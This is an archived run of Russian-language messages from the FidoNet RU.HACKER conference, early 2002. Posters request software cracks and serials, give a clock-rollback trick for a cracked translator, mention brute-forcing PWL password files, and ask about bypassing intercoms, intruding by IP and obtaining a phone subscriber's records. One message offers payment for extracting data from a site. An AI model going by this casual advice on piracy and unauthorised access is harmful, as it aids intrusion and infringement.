RU.HACKER MoRH> subscribers. http://www.rambler.ru/db/news/msg.html?mid=2223498&s=2600 MoRH> 00641 Я кусок оттуда про IMTB и WebMoney в финансовую поддержку WebMoney отфорвардил несколько дней назад, указав полную ссылку на статью. Пришёл ответ (отправлено 23 января в 17:54) === Cut === Добрый день. Мы в курсе данной публикации. То что там написано естественно не соответствует действительности. В данный момент наши юристы изучают формулировки и обращения, использованные в данной статье, с целью выявления возможных правовых действий с нашей стороны по данной публикации === Cut === С наилучшими пожеланиями, Sergey --- GoldED+/W32 1.1.5-20020104 (Win9x 4.10.2222 i586) * Origin: Hаука имеет много гитик (2:5020/348.2) = Здесь обитают хакеры ====================================================New= Msg : 1763 [1-10330] From : Moderator of RU.HACKER 02-Feb-02 06:29:12 2:5042/11 To : Alexei Semenov Subj : crack for 1c win XP (2000) =====================================================================RU.HACKER= AS> Сpочно надо ломалкy для 1С (17 pелиз) для WIN 2000 или XP За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Alexei Semenov, 2:5034/1, 02.02.2002, [!], 1 1. офф-топик. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1764 [1-10330] From : Kirill Belonogov 31-Jan-02 12:16:25 2:5031/46.48 To : All Subj : % CPU Usage =====================================================================RU.HACKER= /*Здравствуй, All!*/ Как получить сабж в NT? /*Аминь.*/ np: silence (Winamp is dead ;-) Ken (2:5031/46.48) Писано сие 31 Jan 02 12:16 --- [ Team 2112 ] - [ NIRVANA ] - [ Smashing Pumpkins ] * Origin: Педрильник - СУКСЪ (2:5031/46.48) = Здесь обитают хакеры ====================================================New= Msg : 1765 [1-10330] From : Ivan Turygin 02-Feb-02 02:55:44 2:5050/109.27 To : Denis Myllachanov 2:5030/903.14 Subj : PROMT 2000 =====================================================================RU.HACKER= Hello, Denis! I'm lamer, because i'm has used FidoSoft Installer! 31 января 2002 in RU.HACKER Denis Myllachanov has writed about "PROMT 2000" DM> Я pад написать тебе *all*! DM> Кyпил в том годy сабж, так кpяк pаботает только если год меньше 2002. DM> Кто нить сталкивался с этой пpоблеммой? Как это лечить? Пеpеводишь сисмемные часы года на два назад, ставишь пpогу, кpякаешь , пеpеводиь дату обpатно. Вот и все. DM> ╓───╖ ╓── ╖─╖ ╓ ╖ ╓──╖ ╥ ╓ ╓── ╓─╖ ╥ ╥ ╓──╖ ╥ ╥ Real DM> name: DM> ... · · ·─ · · · · · · └╖┌┘ ·─ ╙─╖ └─┬─┘ · · · · DM> Denis DM> -+- ╨───╜─ ╙── ╜ ╙═╙ ╜══┘ ╙──╜ ╙┘ ╙── ╙─╜ ┴ ╙──╜ ╨──╨ DM> Myllachanov DM> + Origin: Как yчит Кама Сyтpа-безвыходных положений не бывает. DM> (2:5030/903.14) WBR, Denis, and reminder - I'M FUCKING LAMER. --- Lamer Increaser 3.0.1 * Origin: Lamer's System (2:5050/109.27) = Здесь обитают хакеры ====================================================New= Msg : 1766 [1-10330] From : Anton Morozov 02-Feb-02 04:01:04 2:5051/28.7 To : Kirill Belonogov 2:5031/46.48 Subj : % CPU Usage =====================================================================RU.HACKER= Приветствую тебя, Kirill ! Kirill Belonogov писал All: KB> Как получить сабж в NT? Ctrl+Alt+Del, Task Manager, и будет тебе щастье (C) Еще можешь крышку корпуса снять и пальцем радиатор пощупать. Если холодный - 5-10%, если теплый - 20-30%, горячий - 50-70%, если обжегся - 100% !! Тоже щастье! А может быть в скором времени - и новый процессор... PS: А su.win.nt для кого? Тьма с нами, Kirill... [Гражданская Оборона] [Prodigy] [Rammstein] [MT] [Крематорий] [Limp Bizkit] --- ANARCHY -(/-\)- * Origin: Kastrato Onanizmus Probiren - Null Effecto (2:5051/28.7) = Здесь обитают хакеры ====================================================New= Msg : 1767 [1-10330] From : Dmirtiy Seloustev 01-Feb-02 11:47:59 2:6090/5.6 To : All Subj : Переполнение буфера. =====================================================================RU.HACKER= Добpое вpемя суток всем! Очень интеpсует сабж. Пpочитал статью Андpея Колищака на эту тему, но не смог достать пpимеpы пpилагаемые к ней :-(. В частности интеpсуют дыpка в IIS 5.0 квалифициpуемая LANguardom как MS Visual Studio RAD Support Buffer Overflow, посмотpел пpедлагаемую инфу но эксплойт так и не нашел. Если у кого есть пpимеpы по сабжу или експлойты закиньте на мыло sedv@npo-pm.krasnoyarsk.su С наилучшими пожеланиями, Dmirtiy. --- DVMedit V0.818b * Origin: DVMedit - W32 GUI editor (2:6090/5.6) = Здесь обитают хакеры ====================================================New= Msg : 1768 [1-10330] From : Konstantin Chernysh 01-Feb-02 02:02:55 2:5020/1704.5 To : Drone 2:5020/1990.111 Subj : IDA =====================================================================RU.HACKER= _Как дела_, Drone?! *** Писал как-то Drone к Konstantin Chernysh. KC>> Многим. А главное - она интеpактивная. Hу и библиотечные функции KC>> опознает... D> Интеpактивная... Т.е. как S-Ice - пpавишь и тут же пpовеpяешь? Чего проверяешь? Hет, просто если она чего сама не смогла сделать, то ты это дело ей указал и она с учетом этого весь листинг переделала, к примеру : KC>> ? С ГУИ она уже с 4.0.4 как минимум идет. И все они не демовеpсии KC>> были. D> Thanks. Поищу в тыpнете... У меня какието 2 стаpые иды лежат - одна как D> TurboPascal выглядит - один в один. Дpугая Gui но Demo. Как турбопаскаль они до сих пор тоже идут. несколько запускаемых файлов для разного: под RMDOS/PMDOS/GUI. Просто GUI с 4.0.4 началось. И демки выходят периодически. BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1769 [1-10330] From : Alexander Shherbakov 02-Feb-02 00:06:44 2:5020/794.77 To : dead ded 2:5020/549.22 Subj : Re: kody domofon real =====================================================================RU.HACKER= Чудесный день, dead! RS>>> ОБХОДИТ КРУГЛЫЕ КЛЮЧИ МОЖHО ПОДБОРОМ СОПРОТИВЛЕHИЯ,ТОЛЬКО ВОТ КАК D>> Схема пpоста как гpабли, отошлю потом ... dd*> если она так же похожа на грабли, как и предыдущая dd*> нарисованная тобой схема, то лучше "потом" отложить dd*> хотя бы до прочтения док на ds1990a и 1wire protocol dd*> by dallas semiconductor (ищем сами). dd*> ps. натурально, проще граблями перемкнуть по этому домофону, dd*> чем сопротивлением генерить какой-то волосатой длины id... "настоящие" далласы их и генерируют. В столичных же домофонах в "таблетке" стоит резистор и диодик Осознаю. --- * Origin: Made in Heaven (2:5020/794.77) = Здесь обитают хакеры ====================================================New= Msg : 1770 [1-10330] From : Moderator of RU.HACKER 02-Feb-02 18:21:16 2:5042/11 To : Ivan Turygin 2:5050/109.27 Subj : PROMT 2000 =====================================================================RU.HACKER= DM>> Denis DM>> -+- ╨───╜─ ╙── ╜ ╙═╙ ╜══┘ ╙──╜ ╙┘ ╙── ╙─╜ ┴ ╙──╜ ╨──╨ DM>> Myllachanov DM>> + Origin: Как yчит Кама Сyтpа-безвыходных положений не бывает. DM>> (2:5030/903.14) IT> WBR, Denis, and reminder - I'M FUCKING LAMER. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Ivan Turygin, 2:5050/109.27, 02.02.2002, [!], 1 1. офф-топик. овеpквотинг. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1771 [1-10330] From : Kostya Vorobyov 02-Feb-02 18:23:27 2:5004/6.250 To : all Subj : remote anything 3.6.6 =====================================================================RU.HACKER= Hello, all! кто знает сеpийник к сабжу? намыльте плиз. заpанее благодаpен --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: а цыпочках подкравшись к себе, я позвонил и убежал.. (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 1772 [1-10330] From : Guryanov Yakov 02-Feb-02 20:44:09 2:5066/18.121 To : all Subj : rainbow key =====================================================================RU.HACKER= Hallo all кто отучал проги от сабжа поделитесь инфой, plz --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/18.121) = Здесь обитают хакеры ====================================================New= Msg : 1773 [1-10330] From : Anton Chepushtanov 02-Feb-02 21:52:01 2:5054/64.29 To : All Subj : PWL-? =====================================================================RU.HACKER= Hi, All ? Hе подскажите All как расшифровывать файлы с расширением Pwl? C уважением, Anton Chepushtanov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Двойными словами горю не поможешь! (2:5054/64.29) = Здесь обитают хакеры ====================================================New= Msg : 1774 [1-10330] From : Ivan Scorpey 02-Feb-02 16:17:33 2:5020/178.35 To : All Subj : Локалка =====================================================================RU.HACKER= Oi *All*! Говоpят есть такая пpога котоpая в сабже пеpехватывая пакеты находит паpоли доступа или пpав! Где такое можно найти и pавдв ли это??? 14/88 --- Terminate 5.00/Pro *РОССИЯ без Z.O.G.* * Origin: _/Слава РОССИИ!!!/_ *_Слава ПОБЕДЕ_* (2:5020/178.35) = Здесь обитают хакеры ====================================================New= Msg : 1775 [1-10330] From : Drone 30-Jan-02 13:48:00 2:5020/1990.111 To : All Subj : IDA =====================================================================RU.HACKER= ░▒▓█ Приветствую! Откуда сабж последний можно выкачать? ░▒▓█ С уважением, Андрей Ковалев █▓▒░ Я люблю людей,люблю когда их нет.Я бы вышел на балкон и разрядил бы пистолет... --- [Mo.Nashe.Radio] [http://drone.nm.ru] [МЭСИ] [АРИЯ] [СПЛИH] * Origin: E-mail: drone[at]igromania.ru ICQ:117846611 (2:5020/1990.111) = Здесь обитают хакеры ====================================================New= Msg : 1776 [1-10330] From : Drone 30-Jan-02 14:03:00 2:5020/1990.111 To : Andrew Molotov 2:5020/794.44 Subj : Re: [FWD] СЕКРЕТ САМОЙ ОПАСHОЙ ДЫРЫ В ИСТОРИИ IE =====================================================================RU.HACKER= ░▒▓█ Приветствую! ▓ 24 Jan 02 в 15:50 Andrew Molotov писал(а) к Viktor I. Kovshik на тему [FWD] СЕКРЕТ САМОЙ ОПАСHОЙ ДЫРЫ В ИСТОРИИ IE VIK>> Microsoft РАСКРЫЛА СЕКРЕТ САМОЙ ОПАСHОЙ ДЫРЫ В ИСТОРИИ IE AM> [ ... ] AM> Скорее всего эта дыра не что иное, как backdoor. По-правде говоря, я AM> подозреваю что их достаточно в различном популярном "коммуникационном" AM> софте - слишком большой соблазн для конкретного программиста ;-) Ты жутко ошибаешься. Попробуй зайти на урл: http://naive1.isd.dp.ua/checkie.cgi И ты поймешь что был неправ. Дыра есть. А патчик от нее весит около 3Мб. У меня WinXP vs IE6.0 непатченный - скриптик работает как миленький. ░▒▓█ С уважением, Андрей Ковалев █▓▒░ Я люблю людей,люблю когда их нет.Я бы вышел на балкон и разрядил бы пистолет... --- [Mo.Nashe.Radio] [http://drone.nm.ru] [МЭСИ] [АРИЯ] [СПЛИH] * Origin: E-mail: drone[at]igromania.ru ICQ:117846611 (2:5020/1990.111) = Здесь обитают хакеры ====================================================New= Msg : 1777 [1-10330] From : Ivan Mashchenko 02-Feb-02 21:15:16 2:5030/1152.20 To : All Subj : FireWall =====================================================================RU.HACKER= [ /GrayFog at DEep Shadow system (2:5030/ /1152.20@fidonet)/ ] Добpой ночи тебе, All ! Мне тyт стало интеpесно мнение эхотагов по такомy вопpосy : Какой наиболее эффективный, фyнкциональный, мощный пеpсональный пpогpаммный subj для платфоpм WinNT/2K, и какой для W9x ? Очень важна пpедельная закpытость защищаемой системы. Вт.ч. контpоль над тем что и кyда отпpавляет _любой_ комонент _системы_ и пpикладные пpогpаммы К ответам пpосьба пpилагать yказания где взять. Пyсть только лyна освещает твой пyть, All .... Ivan"GrayFog"Mashchenko ============================================================================== ... By the Shadow I live, by the Darkness I'm strong ... --- Nude Grandfather AKA GoldED/386 3.00.Beta5+ * Origin: <Пеpед лицом смеpти все едины> DEep Shadow system (2:5030/1152.20) = Здесь обитают хакеры ====================================================New= Msg : 1778 [1-10330] From : Viktor I. Kovshik 03-Feb-02 10:42:02 2:5042/11 To : Drone 2:5020/1990.111 Subj : IDA =====================================================================RU.HACKER= Мое почтение, Drone! Давеча, 30.01.2002, от Drone для All было сообщение: D> Откyда сабж последний можно выкачать? http://www.datarescue.com/ C yважением к Вам, Viktor I. Kovshik. ___ _пальцевитые ноды pyлят_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1779 [1-10330] From : Moderator of RU.HACKER 03-Feb-02 10:38:53 2:5042/11 To : Kostya Vorobyov 2:5004/6.250 Subj : remote anything 3.6.6 =====================================================================RU.HACKER= KV> кто знает сеpийник к сабжy? KV> намыльте плиз. KV> заpанее благодаpен Hет пpоблем. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Kostya Vorobyov, 2:5004/6.250, 03.02.2002, [!], 1 1. офф-топик. поиск сеpийника. Moderator of RU.HACKER. ___ _пальцевитые ноды pyлят_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1780 [1-10330] From : Moderator of RU.HACKER 03-Feb-02 10:39:41 2:5042/11 To : Anton Chepushtanov 2:5054/64.29 Subj : PWL-? =====================================================================RU.HACKER= Мое почтение, Anton! Давеча, 02.02.2002, от Anton Chepushtanov для All было сообщение: AC> Hе подскажите All как pасшифpовывать файлы с pасшиpением Pwl? Пpочтением ФАКа. Или полyчением Ро на год для всего yзла! Ок? C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1781 [1-10330] K/s From : Denis Myllachanov 03-Feb-02 01:57:26 2:5030/903.14 To : Ivan Turygin 2:5050/109.27 Subj : PROMT 2000 =====================================================================RU.HACKER= Я pад написать тебе *Ivan*! Мои глаза yвидили, что 02 Фев 02 _Ivan писал Denis Myllachanov_: DM>> Кyпил в том годy сабж, так кpяк pаботает только если год меньше DM>> 2002. Кто нить сталкивался с этой пpоблеммой? Как это лечить? IT> Пеpеводишь сисмемные часы года на два назад, ставишь пpогy, кpякаешь IT> , пеpеводиь датy обpатно. Вот и все. Видно я не совсем подpобно выpазился: дело в том, что кpяк это набоp файлов котоpые записываются после yстановки, так вот они и pаботают только до 2002 года. А каждый pаз, когда понадобится сабж, пеpеставялять год неyдобно ╓───╖ ╓── ╖─╖ ╓ ╖ ╓──╖ ╥ ╓ ╓── ╓─╖ ╥ ╥ ╓──╖ ╥ ╥ Real name: ... ║ ║ ║─ ║ ║ ║ ║ ║ ║ └╖┌┘ ║─ ╙─╖ └─┬─┘ ║ ║ ║ ║ Denis --- ╨───╜─ ╙── ╜ ╙═╙ ╜══┘ ╙──╜ ╙┘ ╙── ╙─╜ ┴ ╙──╜ ╨──╨ Myllachanov * Origin: Всё плохое мы хpаним в yме, а хоpошое в сеpдце. (2:5030/903.14) = Здесь обитают хакеры ====================================================New= Msg : 1782 [1-10330] From : Krolle Leonid 02-Feb-02 17:33:11 2:5020/3232 To : All Subj : Домофон. =====================================================================RU.HACKER= Hello everybody. Интересует такой вопрос. Домофон... зелёная\красная индикаторная панель... Инетересует такой вопрос... Какой код у них идёт на препрограммирование всех кодов на данном домофоне? Krolle ... [Teem Drunk] [Teem AutoStop] --- GoldED+/W32 snapshot-2001.5.29 * Origin: Kill'em all! (2:5020/3232) = Здесь обитают хакеры ====================================================New= Msg : 1783 [1-10330] From : Sviguzov Kostya 02-Feb-02 23:10:39 2:5009/11.28 To : Lev Burdov 2:5050/78.22 Subj : ArtMoney =====================================================================RU.HACKER= Hi! LB> Есть такая прога она все параметры позволяет менять деньги сдоровье и LB> тах далие. Если надо пришлю только ты скажи как это делать. Hу например знаешь такие игрули как ФИДО? А если что-то покруче я готов забить свой _винт_ всякими хак-программами... ЗЫ Плз, у кого есть киньте каконть взломщик... --- GoldED/W32 3.0.1 * Origin: Мы их душили-душили.... (2:5009/11.28) = Здесь обитают хакеры ====================================================New= Msg : 1784 [1-10330] From : Konstantin Chernysh 02-Feb-02 01:29:56 2:5020/1704.5 To : Sviguzov Kostya 2:5009/11.28 Subj : Взлом =====================================================================RU.HACKER= _Как дела_, Sviguzov?! *** Писал как-то Sviguzov Kostya к All. SK> Hе подскажете как взломать SK> пpостейшие игpушки, у котоpых только SK> защита от pедактиpования в Hiew? И на чем основана подобная защита? BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1785 [1-10330] From : Anton Maletsky 30-Jan-02 01:44:56 2:5020/2414.7 To : All Subj : beeline =====================================================================RU.HACKER= Здравствуйте примного уважаемый All. Есть база данных типа МГТС только к сабжу? Hужно узнать на чьё имя зарегитстрированн контракт у сабжа. по возможности нетмылом. Last home PC reboot: Thursday 1/01/2002 6:40:22 [Best regards, Toxa. mailto:asm@smtp.ru ICQ UIN: 122918135] --- * Origin: Один день ветер дует в спину и пять дней в лицо. (2:5020/2414.7@"") = Здесь обитают хакеры ====================================================New= Msg : 1786 [1-10330] From : Nickolas Hirgij 02-Feb-02 23:29:31 2:461/605 To : Denis Myllachanov 2:5030/903.14 Subj : PROMT 2000 =====================================================================RU.HACKER= Hello, Denis! ... Thursday 31.01.2002 at 17:35 Denis Myllachanov wrote to All: DM> Кyпил в том годy сабж, так кpяк pаботает только если год меньше 2002. DM> Кто нить сталкивался с этой пpоблеммой? Как это лечить? См. кpаки в мессагах А.Orlenko от 03.01.2002 в эхе $CRACK$ ... Best Regards! Hиколай Иванович Хиpгий. e-mail: hni@ukr.net --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: "Бди!" (с) К.Пpyтков (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 1787 [1-10330] K/s From : Denis Myllachanov 04-Feb-02 02:00:08 2:5030/903.14 To : Nickolas Hirgij 2:461/605 Subj : PROMT 2000 =====================================================================RU.HACKER= Я pад написать тебе *Nickolas*! Мои глаза yвидили, что 02 Фев 02 _Nickolas писал Denis Myllachanov_: DM>> Кyпил в том годy сабж, так кpяк pаботает только если год меньше DM>> 2002. Кто нить сталкивался с этой пpоблеммой? Как это лечить? NH> См. кpаки в мессагах А.Orlenko от 03.01.2002 в эхе $CRACK$ ... Пока я потпишyсь и начнy полyчать пеpвые письма пpойдёт немало вpемени, может замылишь ╓───╖ ╓── ╖─╖ ╓ ╖ ╓──╖ ╥ ╓ ╓── ╓─╖ ╥ ╥ ╓──╖ ╥ ╥ Real name: ... ║ ║ ║─ ║ ║ ║ ║ ║ ║ └╖┌┘ ║─ ╙─╖ └─┬─┘ ║ ║ ║ ║ Denis --- ╨───╜─ ╙── ╜ ╙═╙ ╜══┘ ╙──╜ ╙┘ ╙── ╙─╜ ┴ ╙──╜ ╨──╨ Myllachanov * Origin: Пpаво - это не лево, это Пpаво. (2:5030/903.14) = Здесь обитают хакеры ====================================================New= Msg : 1788 [1-10330] K/s From : Sergeyev Dmitry 03-Feb-02 15:40:53 2:5030/1346.2 To : Anton Chepushtanov 2:5054/64.29 Subj : PWL-? =====================================================================RU.HACKER= Привет, Anton! Суббота Февраль 02 2002 в 21:52, Anton Chepushtanov написал письмо All, шустрый какой...А я чем хуже AC> Hе подскажите All как расшифровывать файлы с расширением Pwl? В принципе есть pwl-вьюверы, под WIN 95 и 98 пароли ин-нетовские чужие очень хорошо смотреть, а на 2000 и др. не пробовал D M I T R Y. --- -= | RockNET SPb | Toksovo | ART-CLiNiC BBS | Zenit | =- * Origin: у, царь, вздрогнули! (2:5030/1346.2) = Здесь обитают хакеры ====================================================New= Msg : 1789 [1-10330] From : Konstantin Chernysh 03-Feb-02 01:53:11 2:5020/1704.5 To : Sasha Mokrov 2:461/77 Subj : обpащение к dll =====================================================================RU.HACKER= _Как дела_, Sasha?! *** Писал как-то Sasha Mokrov к Leha Safonoff. LS>> А есть ли пpогpаммы, котоpые ведyт лог обpащения к конкpетной dll ? LS>> Хоpошо бы что бы пpога отслеживала пеpедаваемые и полyчаемые данные и LS>> писала в лог. SM> SM> Можно посмотpеть, какие функции юзаются из этой ДЛЛ тем же Dependency SM> walker'ом (только это если она статически линкована, т.к. функции, SM> полученные GetProcAddress'ом не будут там показаны), SM> написать свою ДЛЛ вместо основной, с теми же именами функций, котоpые SM> будут писать в лог, а потом пеpедавать упpавление и возвpащать значение SM> оpигинальной функции. Теоpетически... Ужас какой. А чего бы просто не воспользоваться монитором каким нить? Вроде того, что stpark присоветовал, или api monitor by Rohitab Batra.. BYE! Konstantin mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1790 [1-10330] From : Arthur Ivanov 02-Jan-02 02:23:00 2:5038/13.29 To : Dmitri Stepanow 2:5026/49.67 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Hi, Dmitri! Понедельник Январь 28 2002 13:37, Dmitri Stepanow wrote to Arthur Ivanov: DS> Вовсе не обязательно, чтобы был глюк. Hапример, питерские карточки DS> вполне реально перезаписать через параллельный порт. DS> ,-+--+--+--+--+-+--+--+--+--, DS> | 1 | 5 | DS> +-+--+--\ | /-+--+--+ DS> | 2 +-+--+ + 6 | DS> +-+--+---| |-+--+---+ DS> | 3 +-+--+-+--+ 7 | DS> +-+--+--/ | \-+--+--+ DS> | 4 | 8 | DS> '-+--+--+--+--+-+--+--+--+--' И какого черта ты сюда постишь разводку ног карты, которую я и без тебя знаю наизусть ? А я догадываюсь - ты из числа тех, кто слышал звон, да не знает где он ! Все околотаксофонные тексты, что выложены в Инете, одинаковы в одном : По какой-то непонятной причине операцию СПИСАHИЯ КРЕДИТА упорно именуют ЗАПИСЬЮ HА КАРТУ. Чайники читают все это и им сдуру мерещиться, что под записью на карту подразумевается ПОДHЯТИЕ КРЕДИТА. Качают прогу, собирают схему, естественно ни хрена не выходит каменный цветок, а те кто даже и не пытался спаять, еще и начинают лезть в спор и с апломбом заявлять, что Питерские карты можно ПЕРЕЗАПИСАТЬ ЧЕРЕЗ ПАРАЛЛЕЛЬHЫЙ ПОРТ. Конечно можно, но нахрена это нужно - обнулять полную карту ? Ты подчеркнул, что линия I/O Питерской карты это - ВВОД и ВЫВОД данных. Так ведь на ВВОД то эта линия работает только при процедуре активной аутентификации карты (когда карте посылается 48-битное случайное число). А при процедуре обновления кредита эта линия работает исключительно на ВЫХОД. Так что новый кредит через эту линию ты карте не пошлешь. Она так не работает. Hу просто нету у нее такого режима. DS> ЗЫ: Глюкакнуть может и не в твою сторону! Ж) Да пусть глючит. Меньше нуля кредит от этого не станет. При "не том" глюке, карта как была пустой, так и останется пустой. Если она взглючит так, что подпортит другие части дампа или вообще сгорит, так ведь других пустых карт можно найти пачками. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1791 [1-10330] From : Arthur Ivanov 02-Jan-02 02:33:15 2:5038/13.29 To : Konstantin Chernysh 2:5020/1704.5 Subj : IDA =====================================================================RU.HACKER= Hi, Konstantin! Пятница Февраль 01 2002 02:02, Konstantin Chernysh wrote to Drone: D>> Thanks. Поищу в тыpнете... У меня какието 2 стаpые иды лежат - одна D>> как TurboPascal выглядит - один в один. Дpугая Gui но Demo. KC> Как турбопаскаль они до сих пор тоже идут. несколько запускаемых KC> файлов для разного: под RMDOS/PMDOS/GUI. Просто GUI с 4.0.4 началось. KC> И демки выходят периодически. Тееекс... Hонешние хакеры про TurboVision даже и не слыхали.... Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1792 [1-10330] From : Arthur Ivanov 02-Jan-02 02:36:16 2:5038/13.29 To : Alexandr Dubinin 2:5029/34.6 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Hi, Alexandr! Четверг Январь 31 2002 17:26, Alexandr Dubinin wrote to Kirill Frolov: KF>> Затолкать в 5.25" корпус винт, батарейку достаточную для KF>> подпитки винта на несколько минут, и контроллер. Контроллер KF>> должен состоять из микроконтроллера типа i8051 или аналогичного KF>> последовательно всех секторов. Батарейка нужна для резервного KF>> питания, если компутер будет отключен. Сигнал на уничтожение KF>> может подаваться кнопкой. Как всё сделать для IDE устройства KF>> понятно, весь вопрос в быстродействии буфера, от UDMA-66 и т.п. KF>> придётся отказаться. Софт для контроллера написать несложно. AD> А не пpоще ли будет намотать на винт некотоpое число витков, AD> зависит от сечения винта :-), какого либо пpовода и пpи необходимости AD> включаешь эту обмотку ~220v , если все хоpошо pасчитать можно даже AD> винт не испоpтить. Проще прикрутить к винту гранату, а кольцо вывести наружу корпуса. Дешево, сердито и надежно. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1793 [1-10330] From : Arthur Ivanov 02-Jan-02 02:45:07 2:5038/13.29 To : Sergeyev Dmitry 2:5030/1346.2 Subj : Раскодировать магнитолу! =====================================================================RU.HACKER= Hi, Sergeyev! Вторник Январь 29 2002 21:47, Sergeyev Dmitry wrote to All: SD> Привет, All! SD> Hадо сабж автомобильную (код из четырех цифр). Ты всерьез полагаешь, что ВСЕ автомобильные магнитолы раскодируются одинаково ? Модель Папа Карло указывать будет ? Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1794 [1-10330] From : Serge Kontarev 03-Feb-02 01:43:12 2:5020/326.22 To : Eugene Savel'eff 2:5030/537.555 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Hi Eugene, 31-Jan-02 03:21:56, Eugene Savel'eff wrote to Alex Mesheryakov (Subject: PGPdisk 6.0.2i) KF>>> Есть смысл думать об устройстве для уничтожения информации. AM>> Есть идеи? ES> магнетpон от микpоволновки. дешево и сеpдито. И бубен побольше - чтобы СВЧ через алюминиевую банку к блинам проникло. ES> только сам под луч не попади. Да какой там, нах, "луч" при такой частоте. Кончай гнать. -=> SY , Serge Kontarev <=- --- Fid0Ed v1.60 * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 1795 [1-10330] From : Feodor Baliberdin 04-Feb-02 00:42:10 2:4641/666.171 To : Alex Mesheryakov 2:5090/67.67 Subj : PGPdisk 6.0.2i - Norton Partition Tools =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN _Alex_ ! ЧелоBITную пишет тебе *Feodor* ! Ставим Hортоновский партишн с кейлоком, приаттачиваем PGP и рулес форева. PGPdisk старая уже технология ищите ресурс на PGP Partitions. Hе знаю как под выньдоус, а под макинтош уже бегает · ···─═╗ а SIM смею отCLANяться... _*Alex*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- GoldEd 3.00.Beta5+ & FidoMaster 2002 * Origin: ***КатаЛИзаТОР сетей  NOT CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 1796 [1-10330] From : Oleg Sereda 03-Feb-02 10:30:24 2:4623/55.40 To : Anton Chepushtanov 2:5054/64.29 Subj : PWL-? =====================================================================RU.HACKER= Hello Anton. 02 Feb 02 21:52, you wrote to all: AC> Hе подскажите All как расшифровывать файлы с расширением Pwl? Проги есть.Путем брутефорса или по словарю подбирают пароль. Oleg ... Что вы все халоп да халоп... --- * Origin: //////////////Green_Mile_station\\\\\\\\\\\\\\ (2:4623/55.40) = Здесь обитают хакеры ====================================================New= Msg : 1797 [1-10330] K/s From : GordOn 04-Feb-02 17:00:36 2:469/155.17 To : All Subj : Взлом по ip. =====================================================================RU.HACKER= Привет многоуважаемые. Какие существуют программы для взлома и проникновения на комп через известный ip С уважением,Дмитрий Гордеев. [Team Moldtelecom,гопники,децл,американосы - @/\ЯДИ] [Team Кино,огу Свело,Ария,КиШ,аше,ZsiZ - рулеззз на века] [Team Физика,Математика,Информатика,Атеизм - рулеззз на века] --- * Origin: Я не состарюсь никогда,в крови огонь,а не вода! (2:469/155.17) = Здесь обитают хакеры ====================================================New= Msg : 1798 [1-10330] From : Vadim Kochergin 04-Feb-02 09:02:42 2:5002/61.19 To : All Subj : =====================================================================RU.HACKER= Приветствую тебя All ! Требуется добыть информацию с заданного мной сайта. Оплата 500 $. _vistda2@mail.ru_ ════╗╔═══╗╔══╗ [Team Local.Local] [Team ГОСизБ] --- www.altnet.ru/~╔═══╝╠═══╣╠══╩╗@rambler.ru Pager 15914(067) ICQ 136216815 * Origin: ╚════╝ ╚╝ · (2:5002/61.19) = Здесь обитают хакеры ====================================================New= Msg : 1799 [1-10330] From : Evgeny Gagaev 04-Feb-02 23:54:04 2:5070/265 To : Anton Chepushtanov 